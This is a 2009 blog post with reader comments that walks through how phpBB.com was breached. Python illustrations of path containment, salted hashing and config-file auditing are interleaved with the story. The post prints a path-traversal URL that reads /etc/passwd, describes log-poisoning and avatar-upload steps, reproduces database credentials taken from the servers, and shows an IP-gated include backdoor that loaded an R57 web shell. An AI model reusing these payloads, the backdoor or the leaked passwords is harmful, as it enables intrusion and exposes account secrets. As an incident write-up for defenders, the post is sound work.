How PHPBB Site was Hacked and How You Can Prevent it
By Angsuman Chakraborty, Gaea News Network. Thursday, February 5, 2009
The simplest way to start this topic is: phpBB has been hacked. You may well have heard of it by now, and there is an equal chance that you haven't. A community with almost 200,000 human members and 400,000 subscribed users has lost its privacy inside that community, and there was nothing phpBB could do but put up a foolish status message like the one below.
But the question is, how did the hacker do it? (Call him a script kiddie if you like, but I don't think 90% of the people calling him that could do half of what he did. No glorification intended.) Here is a step-by-step description.
1. The Vulnerability
phpList is generally located at website_name/phplist. The hacker went there and found that the forum admins were running an old version of it. Much to his amazement, and ours, it was older than the version that had fixed the well-known milw0rm exploit. He used it. Isn't that obvious?
2. Attacking /etc/passwd
Anyone with even a cent's worth of PHP knowledge knows what this file looks like and what it contains. He tried to reach the file mentioned above through a proxy program.
His Target Link: https://www.phpbb.com/lists/admin/index.php?_SERVER%5bConfigFile%5d=../../../../../../etc/passwd
Needless to say, he got it.
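The request above works because a query parameter was allowed to choose which file the application includes, and "../../../../../../etc/passwd" walked straight out of the web root. As an added illustration in Python (not phpList's or phpBB's own code), the block below shows the two checks that stop this: the request may only pick a name from an allowlist, and the resulting path is resolved and confirmed to still lie inside the directory the application owns. The base directory and the config names are assumptions.

```python
"""Containment check for a file path influenced by request input.

Added illustration in Python; this is not phpList's or phpBB's code. The
vulnerable pattern was a request parameter choosing which configuration
file gets included. Two defences are shown: the request may only pick a
*name* from an allowlist, and the resulting path is resolved and checked
to still lie inside the directory the application owns.
"""
from pathlib import Path

# Assumed locations, not paths from the incident.
CONFIG_DIR = Path("/srv/www/phplist/config")
ALLOWED_CONFIGS = {"default": "config.php", "staging": "config.staging.php"}


class PathEscapeError(ValueError):
    """The candidate path would resolve outside the permitted directory."""


def contained_path(base_dir: Path, candidate: str) -> Path:
    """Return base_dir/candidate if it stays under base_dir, else raise.

    resolve() normalises "..", absolute paths and symlinks on the joined
    path, so the comparison is made on what the OS would actually open.
    """
    base = base_dir.resolve()
    target = (base / candidate).resolve()
    if target != base and base not in target.parents:
        raise PathEscapeError(f"{candidate!r} resolves to {target}, outside {base}")
    return target


def config_path_for(request_value: str) -> Path:
    """Map the request parameter to a config file through the allowlist.

    The client chooses a name; the code chooses the path. The containment
    check is kept as defence in depth in case the allowlist is edited badly.
    """
    filename = ALLOWED_CONFIGS.get(request_value)
    if filename is None:
        raise KeyError(f"unknown config name {request_value!r}")
    return contained_path(CONFIG_DIR, filename)


def escapes_config_dir(value: str) -> bool:
    """True if using the raw request value as a path would leave CONFIG_DIR."""
    try:
        contained_path(CONFIG_DIR, value)
    except PathEscapeError:
        return True
    return False


if __name__ == "__main__":
    for probe in ("config.php", "../../../../../../etc/passwd", "/etc/passwd"):
        print(f"{probe!r:40} escapes: {escapes_config_dir(probe)}")
```

The allowlist is the real fix; the containment check only catches mistakes in how the allowlist is maintained. Note that an include path taken from PHP's `$_SERVER` array is still untrusted whenever `register_globals`-style overrides let a request populate that array, which is what the `_SERVER%5bConfigFile%5d` parameter above exploited.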
3. Reaching httpd.conf
The httpd.conf file is the main configuration file for the Apache web server. It shows how directory indexing, HostnameLookups and similar settings are configured for the server. So he moved on to /etc/httpd/conf/httpd.conf.
4. Coding the Error Log
It has been known for some time that the web server's error log can end up containing text an attacker supplied, including code. So that was the best place for him to run his code, work out exactly where the indexing was happening, and derive the hash used for the community profiles. As I said, he found that the hash was f51ee61fe7a83fdf72780912bced0855, and he uploaded his avatar there so that he could gain administrative privileges.
The direct path: /../../../../../../home/virtual/phpbb.com/community/images/avatars/upload/f51ee61fe7a83fdf72780912bced0855_ID.jpg
5. Second Vulnerability
cat /home/virtual/phpbb.com/community/config.php is where you find the config details. But how on earth could the password not at least be encrypted? It just made things easier for him.
And here is what he found:
$dbms = 'mysqli';
$dbhost = 'phpbb.db.osuosl.org';
$dbport = '';
$dbname = 'phpbb';
$dbuser = 'phpbb2';
$dbpasswd = 'saxM9nfRjLbJ2Yy5';
$table_prefix = 'community_';
And from phpList:
$database_host = "localhost";
$database_name = "phpbb_phplist";
$database_user = 'phplist';
$database_password = 'Berti3_Danc3';
6. Cracking Others’ Passwords
There was not much left to do. He found some of the other admins' passwords. One funny thing: someone had his password set to phpbb! How on earth could that not be brute-forced? I wonder too.
7. The Final Blow: Getting the Full Database
The hacker got all the user_id and user_password entries. The users' passwords were stored as unsalted MD5 hashes, and the admins' passwords in the same common hash. If you have ever been an admin of a PHP-based forum, you know that a single MySQL UPDATE on one of the admin accounts is all it takes to get in. Or, if you change their password to yours, you can use the recover-password function, update the list in SQL and save it to a log file, which is what he did eventually. But again, a primitive, normal-user-style recover-password flow for an admin? Oh, phpBB, you were waiting for a punishment, I guess.
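The reason step 6 was so easy is the unsalted MD5 mentioned here: every user who chose the same password has the same hash, and one precomputed table cracks all of them at once. As an added illustration in Python (not phpBB's own code), the block below puts that scheme beside a salted, iterated hash with a constant-time comparison; the iteration count is an assumed value.

```python
"""Password storage: the unsalted MD5 the post describes beside a salted,
iterated hash. Added illustration in Python; this is not phpBB's code.
"""
import hashlib
import hmac
import os

ITERATIONS = 100_000  # assumed work factor; tune to ~100 ms on real hardware


def md5_unsalted(password: str) -> str:
    """The scheme the post describes: no salt, so equal passwords collide
    and one precomputed table cracks every account at once."""
    return hashlib.md5(password.encode()).hexdigest()


def make_hash(password: str, salt: bytes = b"") -> str:
    """Return 'pbkdf2_sha256$<iterations>$<salt hex>$<digest hex>'.

    A fresh 16-byte salt per user means two users with the same password
    get different records, and the iteration count makes each guess cost.
    """
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify(password: str, stored: str) -> bool:
    """Recompute from the stored salt and compare in constant time.

    Anything that is not in the expected record format (for example an
    old bare MD5 string) is rejected rather than guessed at.
    """
    try:
        algo, iters, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iters)
    )
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    # Constructed sample: two admins who chose the same weak password.
    print(md5_unsalted("phpbb") == md5_unsalted("phpbb"))  # True: identical records
    print(make_hash("phpbb") == make_hash("phpbb"))        # False: salted records differ
```

Salting does not rescue a password like "phpbb" from a dictionary attack; it only stops one table from cracking every account at once, and the iteration count then makes each guess per account expensive.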
8. Writing a Shell Script
This could be a mini tutorial in itself, but what he did here was practically rent a permanent room for himself inside the admin directory. How?
- He enabled PHP in template files and added this bit of code to one of the templates:
$ip = $_SERVER['REMOTE_ADDR'];
if ($ip == "x.x.x.x") {
    include("/home/virtual/phpbb.com/community/files/(myid)_82ec9f9eb80df2a16cc3638429631c9f");
}
- The included file happened to be a shell, R57shell actually.
- Then he searched for a writable directory, created a PHP file there and wrote the source code to that file. And there he remained.
Word of Caution
Just my two cents of advice to all webmasters, especially those running PHP applications like Joomla, phpList, WordPress etc.:
- Please keep your software updated, always. I know it is a royal pain, but that is the price you pay for getting it cheap (read: free). PHP is a rapid prototyping and development language. That also means anyone, and I mean anyone, can hack up a quick application in a few hours which can become popular over time through contributions from the open source community. Using a popular PHP application is no guarantee of its safety, as has been proved time and again by Mambo / Joomla, WordPress, phpList etc. vulnerabilities.
- Please use any means available to secure, or at least obfuscate, your passwords to prevent such direct attacks. WordPress, phpBB and many other PHP-based packages store their passwords in the clear in files, which has been proven time and again to be a bad practice. A vulnerability in any PHP software that lets an attacker read plain-text files, like the exploit above, can expose the passwords of every other application on the system that stores passwords in such an inane way. There are ways to run different applications under different user IDs, which keeps each in its own silo. I will discuss them in a later article.
The biggest note is for PHP application developers: please, please refrain from keeping clear-text passwords in text files. I am talking to Matt Mullenweg (just because I know his name) of WordPress, and to the developers of Joomla, phpBB, phpList, modX and a host of other PHP-based applications. I respect what you are doing, but please don't jeopardize the data security of your users.
Game over. Thank you.
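The practical side of the second point is file ownership and permissions: a config.php that any account on the host can read is exactly what a file-read bug in a neighbouring application turns into a database password. As an added illustration in Python (not code from any of the projects named), the block below audits config files under a web root for world- or group-readable permission bits and, optionally, for ownership by the account the application runs as; the file names it looks for and the sample tree it builds are constructed assumptions.

```python
"""Audit configuration files for the exposure the post warns about.

Added illustration in Python, not code from any of the projects named. It
checks that a file holding database credentials is not readable by other
accounts on the host and, optionally, that it is owned by the account the
application runs as, which is the "separate user IDs" advice made concrete.
"""
import os
import stat
import tempfile

# Assumed file names worth checking; extend for your own applications.
CONFIG_NAMES = ("config.php", "wp-config.php", "config.inc.php")


def audit_config_file(path, expected_uid=None):
    """Return a list of findings; an empty list means the file looks fine."""
    st = os.stat(path)
    mode = st.st_mode
    findings = []
    if not stat.S_ISREG(mode):
        findings.append("not a regular file")
    if mode & stat.S_IROTH:
        findings.append("world-readable: every account on the host can read the credentials")
    if mode & stat.S_IWOTH:
        findings.append("world-writable: every account on the host can plant code in it")
    if mode & stat.S_IRGRP:
        # 0640 owned by app:www-data is a common deliberate choice; flag it so
        # the reviewer confirms the group holds nothing but this application.
        findings.append("group-readable: acceptable only if the group is this application's alone")
    if expected_uid is not None and st.st_uid != expected_uid:
        findings.append(f"owned by uid {st.st_uid}, expected uid {expected_uid}")
    return findings


def audit_tree(root, names=CONFIG_NAMES, expected_uid=None):
    """Walk a web root and audit every file whose name is in `names`."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name in names:
                full = os.path.join(dirpath, name)
                report[full] = audit_config_file(full, expected_uid)
    return report


def build_sample_tree():
    """Constructed sample: two config.php files, one exposed (0644), one locked down (0600)."""
    root = tempfile.mkdtemp(prefix="cfg_audit_")
    for subdir, mode in (("phplist", 0o644), ("community", 0o600)):
        d = os.path.join(root, subdir)
        os.makedirs(d)
        p = os.path.join(d, "config.php")
        with open(p, "w") as fh:
            fh.write("<?php $dbpasswd = 'constructed-sample';\n")  # constructed value
        os.chmod(p, mode)
    return root


if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else build_sample_tree()
    for path, findings in audit_tree(root).items():
        print(path, "OK" if not findings else "; ".join(findings))
```

Run it with a web root as the argument to audit a real host, or with no argument to see the two constructed cases side by side. Ownership and mode bits are what actually separate applications once each runs under its own user ID; the check on `expected_uid` is there so that a file accidentally left owned by a deploy or root account is reported too.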
Tags: Hacking, Lost, Open Source, PHP, Php software, PHPBB forum hacking, PHPBB hacking, Privacy
trerrystush
April 15, 2009: 5:39 pm
He. my name Michael. I'm from NYC. I'm 35 years.
April 14, 2009: 12:28 am
Sorry may be not here... but. Thank you.
HectellFeld
March 24, 2009: 9:03 am
I need a driver for my phillips snn6500 wireless netcard please help regards
March 10, 2009: 10:29 am
[...] in the recent past how PHPBB, one of the most important forums for programming related discussions, got hacked. Now, what's the [...]
March 8, 2009: 5:29 pm
Excellent site blog.taragana.com and I am really pleased to see you have this post. Thanks
igor
kellanved
February 17, 2009: 12:59 pm
Oh, and another factual mistake: phpList released the patch two weeks after the attacker exploited the vulnerability. The exploit was used within hours of getting published.
Me
February 16, 2009: 6:39 pm
Next to the original hacker post, this is the dumbest blog post I've ever read. Why? Because you just went with whatever he said about "better security" and copied most of it as well as his other points about the hack that he pretty much followed a guide to be able to use. Storing database passwords in plain text SOMEWHERE in the application is pretty much a requirement for ANY web application, be it phpBB, WordPress, or the software running on this site or any other web app that would require database access. I doubt you have any suggestions on changing this other than repeating the hacker's dumb suggestion of encrypting the password, in which case it STILL has to be in plain text somewhere in the app. There was really nothing that could have been done about a 0-day exploit and, last time I checked, milworm is hardly considered a security source and more a hacking/exploiting site. What this blog should have been doing is blast the actions of the hacker. It was malicious and meant to harm a lot of people and not just the staff of phpBB, and private information was not only accessed but RELEASED to the general public. It's just like a terrorist blowing himself up in the middle of a busy marketplace with no regard for innocent bystanders. Next time please do your due diligence in research when making your blog posts...
Kellanved
February 16, 2009: 5:31 pm
Hi,
February 7, 2009: 10:01 pm
You could have just linked to https://hackedphpbb.blogspot.com/, where the author describes (in pretty much the _exact_ same way you do) how he did it.
shumisha
February 6, 2009: 10:55 am
Hi, I am interested in this. How exactly would you not store the main db access password in clear text? If encrypted, how would you store the encryption key needed for decryption if not in clear text itself?
February 6, 2009: 9:37 am
The article is a discussion of techniques with the intention of enabling websites and PHP-based web application developers to protect themselves. It is neither intended to be a hacking guide nor to encourage any script kiddies to emulate the techniques, which is why some crucial details were deliberately left out and the link was not provided.
yuku
February 6, 2009: 9:33 am
It seems that you got most of the information from hackedphpbb.blogspot.com/. However, you didn't provide more information, for example about how the URL "index.php?_SERVER%5bConfigFile%5d=../../../../../../etc/passwd"
February 6, 2009: 1:45 am
https://www.phplist.com/?lid=274 That is the exploit the hacker used. He hacked the site weeks before that update was released. We were attacked using a 0-day exploit. How do you suggest handling configuration files that aren't in clear text?
monokeeloX